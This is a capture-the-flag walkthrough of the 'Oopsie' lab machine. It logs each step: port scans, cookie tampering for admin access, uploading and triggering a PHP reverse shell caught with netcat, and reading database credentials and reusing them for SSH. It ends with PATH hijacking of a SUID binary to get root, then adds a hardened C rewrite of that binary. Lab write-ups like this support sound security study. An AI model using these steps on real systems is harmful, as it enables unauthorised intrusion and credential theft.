Port recognition with nmap, or you can use recon

┌──(root@ghost)-[/home/ghost]
└─# recon oopsie.htb


[R3C0N] by 0bfxgh0st 4 WWA with ❤
WWA for the #15 !

[OS] Linux (99%)
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-22 12:05 EDT
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 12:05
Completed NSE at 12:05, 0.00s elapsed
Initiating Ping Scan at 12:05
Scanning oopsie.htb (10.129.58.8) [4 ports]
Completed Ping Scan at 12:05, 0.15s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 12:05
Scanning oopsie.htb (10.129.58.8) [65535 ports]
Discovered open port 22/tcp on 10.129.58.8
Discovered open port 80/tcp on 10.129.58.8
Completed SYN Stealth Scan at 12:05, 17.72s elapsed (65535 total ports)
NSE: Script scanning 10.129.58.8.
Initiating NSE at 12:05
Completed NSE at 12:05, 0.00s elapsed
Nmap scan report for oopsie.htb (10.129.58.8)
Host is up (0.17s latency).
Not shown: 61952 closed tcp ports (reset), 3581 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

NSE: Script Post-scanning.
Initiating NSE at 12:05
Completed NSE at 12:05, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 18.06 seconds
           Raw packets sent: 87317 (3.842MB) | Rcvd: 72393 (2.896MB)


[+] [fuzzin server]
http://oopsie.htb [200 OK] Apache[2.4.29], Country[RESERVED][ZZ], Email[admin@megacorp.com], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.29 (Ubuntu)], IP[10.129.58.8], Script, Title[Welcome]

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Fri Jul 22 12:05:39 2022
URL_BASE: http://oopsie.htb:80/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Recursive

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://oopsie.htb:80/ ----
==> DIRECTORY: http://oopsie.htb:80/css/
==> DIRECTORY: http://oopsie.htb:80/fonts/
==> DIRECTORY: http://oopsie.htb:80/images/
+ http://oopsie.htb:80/index.php (CODE:200|SIZE:10932)
==> DIRECTORY: http://oopsie.htb:80/js/
+ http://oopsie.htb:80/server-status (CODE:403|SIZE:275)
==> DIRECTORY: http://oopsie.htb:80/themes/
==> DIRECTORY: http://oopsie.htb:80/uploads/

-----------------
END_TIME: Fri Jul 22 12:18:06 2022
DOWNLOADED: 4612 - FOUND: 2

recon reports two open ports: 22 for SSH and 80 for the web service.

┌──(root@ghost)-[/home/ghost]
└─# curl http://oopsie.htb/
...

<script src="/cdn-cgi/login/script.js"></script>
<script src="/js/index.js"></script>
</body>
</html>

After inspecting the website source we find an interesting path: /cdn-cgi/login

Let's try logging in as guest.

Interesting URL: http://oopsie.htb/cdn-cgi/login/admin.php?content=accounts&id=2. Perhaps by changing id=X we can display other users.

Now we have the admin's Access ID value.

As we can see, the role is decided by cookie values, so changing them gives us a possible attack vector to obtain the admin role.

Setting our new cookie values to role:admin and user:34322

Now we can see the previously forbidden paths, because we are administrator.

┌──(root@ghost)-[/home/ghost]
└─# shellstorm.sh php-daemon 10.10.14.68 1337 > rev.php

Generating a PHP reverse shell with shellstorm.sh

┌──(root@ghost)-[/home/ghost]
└─# nc -lvp 1337

Starting a netcat listener

┌──(root@ghost)-[/home/ghost]
└─# curl http://oopsie.htb/uploads/rev.php

Requesting with curl the path where our file was uploaded, which executes the reverse shell

┌──(root@ghost)-[/home/ghost]
└─# nc -lvp 1337
listening on [any] 1337 ...
connect to [10.10.14.68] from oopsie.htb [10.129.58.8] 36114
Linux oopsie 4.15.0-76-generic #86-Ubuntu SMP Fri Jan 17 17:24:28 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 17:16:16 up  1:28,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ which python3
/usr/bin/python3
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@oopsie:/$ 

Connected. This time we upgraded to a fully interactive shell with python3.

www-data@oopsie:/$ ls /home/
ls /home/
robert
www-data@oopsie:/$ ls /home/robert
ls /home/robert
user.txt
www-data@oopsie:/$ cat /home/robert/user.txt
cat /home/robert/user.txt
f2c74ee8db7983851ab2a96a44eb7981

From here we can read the user.txt flag.

www-data@oopsie:/var/www/html/cdn-cgi/login$ ls
ls
admin.php  db.php  index.php  script.js
www-data@oopsie:/var/www/html/cdn-cgi/login$ cat db.php
cat db.php
<?php
$conn = mysqli_connect('localhost','robert','M3g4C0rpUs3r!','garage');
?>
www-data@oopsie:/var/www/html/cdn-cgi/login$

We obtained robert's credentials. They appear to be for a MySQL database, but we can check whether robert reuses the password for SSH.

┌──(root@ghost)-[/home/ghost]
└─# ssh robert@oopsie.htb
The authenticity of host 'oopsie.htb (10.129.58.8)' can't be established.
ED25519 key fingerprint is SHA256:IzSXDs9dqcYA25jc85qIroMg43bjBJ8DEbPHmAEr8Nc.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'oopsie.htb' (ED25519) to the list of known hosts.
robert@oopsie.htb's password: 
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-76-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Fri Jul 22 17:38:49 UTC 2022

  System load:  0.0               Processes:             117
  Usage of /:   40.5% of 6.76GB   Users logged in:       0
  Memory usage: 15%               IP address for ens160: 10.129.58.8
  Swap usage:   0%


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

275 packages can be updated.
222 updates are security updates.



The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

Last login: Sat Jan 25 10:20:16 2020 from 172.16.118.129
robert@oopsie:~$

And we are in via SSH. Time to elevate privileges.

robert@oopsie:~$ id
uid=1000(robert) gid=1000(robert) groups=1000(robert),1001(bugtracker)
robert@oopsie:~$ find / -perm /6000 2>/dev/null

...

/usr/bin/passwd
/usr/bin/expiry
/usr/bin/wall
/usr/bin/mlocate
/usr/bin/at
/usr/bin/bugtracker
/usr/bin/crontab
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/ssh-agent
/usr/bin/traceroute6.iputils
/usr/bin/newgidmap
/usr/bin/gpasswd
/usr/bin/sudo

Now we should focus on /usr/bin/bugtracker, which is not a standard SUID binary (and robert is a member of the bugtracker group).

robert@oopsie:~$ strings /usr/bin/bugtracker
...

AWAVI
AUATL
[]A\A]A^A_
------------------
: EV Bug Tracker :
------------------
Provide Bug ID: 
---------------
cat /root/reports/
;*3$"
GCC: (Ubuntu 7.4.0-1ubuntu1~18.04.1) 7.4.0
crtstuff.c

Checking the SUID program, we can see it calls 'cat /root/reports/' without an absolute path to cat, so this looks like the place for PATH hijacking.

robert@oopsie:~$ cd /tmp
robert@oopsie:/tmp$ echo '/bin/bash' > cat
robert@oopsie:/tmp$ chmod +x cat
robert@oopsie:/tmp$ export PATH=/tmp:$PATH
robert@oopsie:/tmp$ bugtracker

------------------
: EV Bug Tracker :
------------------

Provide Bug ID: 0
---------------

root@oopsie:/tmp# whoami
root
root@oopsie:/tmp# more /root/root.txt
af13b0bee69f8a877c3faf667f7beacf
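The bugtracker weakness is a setuid-root program that apparently runs `cat /root/reports/<id>` through a shell (the literal string in the binary suggests a system() call), so whatever `cat` comes first in the caller's PATH runs as root. As an added example (not the box's binary and not from the original write-up), here is how such a helper could be written so that PATH hijacking does not work: the bug ID is validated, the report path is absolute, the caller's environment is discarded, and /bin/cat is executed directly with execve. REPORT_DIR and CAT_BIN are assumed values.

```c
// Hardened sketch of a "bug tracker" style setuid helper (added example).
// Fixes shown: validate the id, build an absolute report path, ignore the
// caller's environment, and execve /bin/cat directly instead of system().
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define REPORT_DIR "/root/reports/"   /* directory seen in the strings output */
#define CAT_BIN    "/bin/cat"         /* absolute path: PATH is never consulted */

/* Accept only 1..10 ASCII digits: no '/', '..', spaces or shell metacharacters. */
int valid_bug_id(const char *id) {
    size_t n = strlen(id);
    if (n == 0 || n > 10) return 0;
    for (size_t i = 0; i < n; i++)
        if (id[i] < '0' || id[i] > '9') return 0;
    return 1;
}

/* Write REPORT_DIR + id into out. Returns 0 on success, -1 if id is bad or out is too small. */
int build_report_path(char *out, size_t outsz, const char *id) {
    if (!valid_bug_id(id)) return -1;
    int w = snprintf(out, outsz, "%s%s", REPORT_DIR, id);
    if (w < 0 || (size_t)w >= outsz) return -1;
    return 0;
}

/* Show the report with a minimal, fixed environment. Does not return on success. */
int show_report(const char *id) {
    char path[256];
    if (build_report_path(path, sizeof path, id) != 0) {
        fprintf(stderr, "invalid bug id\n");
        return -1;
    }
    char *const argv[] = { (char *)CAT_BIN, "--", path, NULL };
    char *const envp[] = { "PATH=/usr/bin:/bin", NULL };  /* caller's PATH is discarded */
    execve(CAT_BIN, argv, envp);   /* no shell: no PATH lookup, no word splitting */
    perror("execve");
    return -1;
}

int main(void) {
    char id[32];
    printf("Provide Bug ID: ");
    if (!fgets(id, sizeof id, stdin)) return 1;
    id[strcspn(id, "\n")] = '\0';
    return show_report(id) == 0 ? 0 : 1;
}
```

With this layout a `cat` placed in /tmp and prepended to PATH is never found, because the shell is not involved and the executable path is fixed; dropping the setuid bit in favour of a group-readable reports directory would remove the root boundary entirely.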